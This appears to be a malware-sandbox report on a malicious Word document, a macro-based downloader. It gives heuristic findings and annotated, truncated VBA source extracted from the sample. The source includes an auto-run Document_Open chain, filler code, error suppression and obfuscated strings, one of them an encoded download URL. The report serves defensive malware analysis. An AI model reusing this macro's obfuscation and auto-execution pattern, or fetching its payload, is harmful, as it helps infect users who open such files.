MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The presence of CreateObject and CallByName calls further indicates the execution of arbitrary code. ClamAV detection as 'Doc.Dropper.Donoff-5743527-0' strongly suggests its malicious nature as a dropper. The VBA script's obfuscated nature prevents a detailed analysis of its specific actions, but the overall pattern points to a macro-based downloader.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
-
CallByName call — high — OLE_VBA_CALLBYNAME: CallByName call
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
- URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
- URL: http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
- URL: http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19104 bytes |
| SHA-256: cb1ddb73da06febebf0a5877dc51319a3a1033d60bc7b44025ecafdd01d9de6e | | | |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Not referenced anywhere in the visible listing, and every procedure it calls
' (JBGCrVx, eklaYYxB, XRTLmWclX, tlwOUP, Jfqiww, ...) is undefined in the
' extracted source. This is consistent with filler code padding the macro;
' treat it as noise rather than behaviour (TODO confirm once the truncated
' modules are available). Neither parameter is used in the body.
Private Sub WyyWULWYSi(ByVal OBEdkizvIqANSj As String, ByVal iTcptNtitkX As Integer)
JBGCrVx True, "61wH1rFeSckSe4WmjgC", 9044
eklaYYxB "BqJ9zUcRjgcgRXBEcoKmoRJv88HLj", "EFyjiZ4NyH7nAqOXr"
XRTLmWclX
' Assignments below go to undeclared names and are never read in this listing.
LFMitxQT = 6741
If tlwOUP("7uSQTjm0DKEmrUbeqOAlOqe3SA2XSf", 886, 440) Then
FVoXCU = 9024
Jfqiww
DeMBErMM 1883
qfmfnUhU = 3192
ogQaKhB "E7H3kjiKQlrB4uz4hY"
yxvDZxGOono = "4V9Prmqq5pp2T3boDTt53SgVtZp6FwX"
Else
VPqSaCwywvi 653, 5024, 4694
iVcFllAOL "XSzIiqG023tL0tBudBlk88rPScG3D", 9258
dLXNRHI
UDjzxhB = False
End If
End Sub
' Same pattern as WyyWULWYSi: not called from the visible listing, calls only
' names that are not defined in the extracted source, and never uses its
' parameter. Reads as filler; treat as noise (TODO confirm against full source).
Private Sub gfKVhnpWu(ByVal XjlJlQPCcmrv As Integer)
zLRlicMtXXKlV "rOrKUsrEkpwsCCW33P41pQu8ZoooG", "0WaQ7ihJDYiixj5e3T6XklW4P7TxHqn", "WBbZEwbE7I4LWwSJRi7zx0Nln"
vHqrgNeYdpuy = 358
HTcopEWFEd
RdzhvqvlE = "xLVtiCYc7iFsaEsELLyxuwRS2Di"
If TZLddMcA(True, 55, True) Then
alkeJPfCbUMBdm = 4069
MeckKl 555, "z8MCplodnJF9rbC7h8GUk", 2131
dQGWuKA = "pDgH1VBPv1VycHgrWtVCcIFdtPlSYW"
wsMERaKf
Else
LscCUh
sDTkJvthsychG 9355
IAQqnKpk = "Hfn8wNq6VVqVQpYvlNlGkhUODToBp"
End If
End Sub
' Auto-execution entry point: Word runs this when the document is opened
' (the OLE_VBA_DOCOPEN finding). Both locals are declared but never used;
' the only live statement hands control to kTCWjU in module jEvmGvhtVJWZ,
' which is the start of the real call chain.
Private Sub Document_Open()
Dim plTZdPka As Integer
Dim ncigYiQhft As Boolean
jEvmGvhtVJWZ.kTCWjU
End Sub
Attribute VB_Name = "jEvmGvhtVJWZ"
' Not referenced in the visible listing; FgpUGo and qllxLM are undefined in the
' extracted source and neither parameter is used. Filler — treat as noise.
Private Sub SPmuRuORMlor(ByVal HgIZusrEmlYCXQ As String, ByVal EBQLGMY As String)
FgpUGo "EGD1Z1OQJ8AZSdcOhhc"
xAfBi = "fB9G2pgh9CloiivBucrFwQojd2Wa"
qllxLM "dQgTZOvp02GroYMHMWLo62TWcsxzRY", "8ojFpr5Fio5WOJgO1pNLTO", True
End Sub
' Not referenced in the visible listing; every callee is undefined in the
' extracted source and neither parameter is used. Filler — treat as noise.
Private Sub SPIypoc(ByVal PpSewz As Integer, ByVal qdFDWQxu As String)
uAPgblLe 3110
jPjtiINzaY = 6371
CNDhphipo "A78Ku2RnJsbgaamys", "G6AkAjTKsKWIwp48BaH0ctXRvlKgDH"
IhvwV = True
LBgHikUSTuk
End Sub
' Not referenced in the visible listing; three bare calls to names that are
' undefined in the extracted source, parameters unused. Filler — treat as noise.
Private Sub bVdQWOlL(ByVal ozcccogqQJ As String, ByVal QOBsDKJS As Boolean)
bqrshfOOnObQar
sJhKGp
AXJwRmSPOAkc
End Sub
' Late-bound object factory: instantiates whatever ProgID the caller supplies
' in pEarGnj (the OLE_VBA_CREATEOBJ finding) and returns it through the
' pass-through function QFzYcmJViwYIP. Because the ProgID arrives as a
' parameter, no literal CreateObject("...") string exists in this module for a
' keyword scan to catch. TUvONr and both locals are unused. Not called from
' the visible listing; the caller is presumably in a module that is not shown
' — confirm against the full source.
Public Function mshXOCr(ByVal pEarGnj As String, ByVal TUvONr As String) As Object
Dim jRxEbKDa As Integer
Dim XCZIIIHPUk As String
Set mshXOCr = QFzYcmJViwYIP(CreateObject(pEarGnj))
End Function
' Reached from Document_Open. The On Error GoTo handler jumps to an empty
' label, so any runtime error raised by the calls below is swallowed and the
' sub returns quietly with no error dialog shown to the user. Calls two members
' of ttVXuQ (a module outside the visible listing) and then lMdfkjFy, which is
' where the decoded-string functions further down are consumed. Both locals
' are unused.
Public Sub kTCWjU()
Dim VYJDCDbnTrw As String
Dim mPVZLmKXRSHyBt As Integer
On Error GoTo slDgQgrOOSTgn
ttVXuQ.YIuXEJoscsaj
ttVXuQ.MIYUXhxY
lMdfkjFy
Exit Sub
slDgQgrOOSTgn:
' Empty error handler: failures are discarded.
End Sub
' Not referenced in the visible listing; AHuyFwATrHBOv and every callee are
' undefined in the extracted source, and fdgeL is unused. Filler — treat as
' noise (TODO confirm once the truncated modules are available).
Private Sub nsYPZNJ(ByVal fdgeL As String)
iUzhs = "KmYsR7JIDoubdQl14wrvbBok"
If AHuyFwATrHBOv Then
KPWbwiTHxKEiL False, "T5LdCaD3BwhlO844SJbShL2kXiAvn8"
fsfyAnHlp
LhbSRruW True
Else
CJAzEj 2123
End If
jFyGoZAutdqkGd "qhW0gCWZu7fR2FUiyWYD0lpxokEuO1", 972
End Sub
' Identity pass-through: returns its argument unchanged. Exists only to add a
' level of indirection around the CreateObject result in mshXOCr. The local
' is unused.
Private Function QFzYcmJViwYIP(ByVal wBCzXKPHCoZf As Object) As Object
Dim qvVvJqxo As Integer
Set QFzYcmJViwYIP = wBCzXKPHCoZf
End Function
' Consumer of the decoded strings. vravubiPvDRh (supplied by lMdfkjFy as the
' output of BnLAMbzZZAofvM) goes to YovrSSgvMPJO.QceWTMEJaYLCQj; its result is
' then passed, together with the decoded CfMkynEbhSr value, to
' YovrSSgvMPJO.MMhiDsZmghwW, and together with the decoded HBgZTg value to
' IyVrcDHGq.TaoElp and on to IGprEAKJAuxR.pugilrQ. All three of those modules
' are outside the visible listing, so what they do with the values cannot be
' confirmed here. HnOErTetEaKlM is forwarded as the last argument to pugilrQ;
' ZTutrQVKg is unused. vzvwrEQSoD is never declared in this procedure.
Private Sub QvXwf(ByVal HnOErTetEaKlM As String, ByVal ZTutrQVKg As String, ByVal vravubiPvDRh As String)
Set vzvwrEQSoD = YovrSSgvMPJO.QceWTMEJaYLCQj(True, vravubiPvDRh)
YovrSSgvMPJO.MMhiDsZmghwW CfMkynEbhSr, 2670, "arguyw2nGgGkc6QAe5NL", vzvwrEQSoD
IGprEAKJAuxR.pugilrQ IyVrcDHGq.TaoElp(HBgZTg, vzvwrEQSoD, 8879), False, "cejo7MPw6YS1LmNofeBzpX", HnOErTetEaKlM
End Sub
' Second step of the live chain (Document_Open -> kTCWjU -> here). Calls QvXwf
' with IGprEAKJAuxR.SxhCKi, a literal, and the decoded BnLAMbzZZAofvM value as
' the third argument, then IGprEAKJAuxR.ukYSHemkFaQeJd. IGprEAKJAuxR is not in
' the visible listing. The local is unused.
Private Sub lMdfkjFy()
Dim VLjTCnVrJU As Boolean
QvXwf IGprEAKJAuxR.SxhCKi, "jh1u3B528NFiUmAXx8lNtG5R0EI", BnLAMbzZZAofvM
IGprEAKJAuxR.ukYSHemkFaQeJd False, 618, IGprEAKJAuxR.SxhCKi
End Sub
' String-decoding wrapper: returns BOKWxMMrFkr.iKBNbg(payload, key). iKBNbg is
' defined in the truncated BOKWxMMrFkr module, so its algorithm is not visible
' here; the key is a short set of characters that also recur inside the
' payload, which is consistent with a strip-these-characters decode — confirm
' against the full source. The decoded value (not this literal) is what QvXwf
' passes to YovrSSgvMPJO.MMhiDsZmghwW.
Private Function CfMkynEbhSr() As String
CfMkynEbhSr = BOKWxMMrFkr.iKBNbg("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
' Same decoder call as CfMkynEbhSr with a different payload/key pair. The
' result is passed to IyVrcDHGq.TaoElp inside QvXwf; given the CallByName
' finding it is plausibly a member name resolved at runtime, but that cannot
' be confirmed from the visible listing — recover it from a sandbox run.
Private Function HBgZTg() As String
HBgZTg = BOKWxMMrFkr.iKBNbg("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
' Same decoder call as the two functions above. This payload is the longest
' of the three and contains a "://" fragment, so it is likely an obfuscated
' URL; its output is what lMdfkjFy feeds into QvXwf. Recover the decoded value
' from the sandbox/emulated run rather than by hand and record it as the
' network indicator for this sample (TODO confirm iKBNbg semantics from the
' truncated BOKWxMMrFkr module).
Private Function BnLAMbzZZAofvM() As String
BnLAMbzZZAofvM = BOKWxMMrFkr.iKBNbg("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function
Attribute VB_Name = "BOKWxMMrFkr"
Private Function eVoEHMFWcUs(ByVal LVWIVzceQWVK As Integer, ByVal yVbFEr As Integer, ByVal agcsvDDW As String, ByVal MYcew As String) As String
If Not FxqHauXhrNAYyw.YcJR
... (truncated)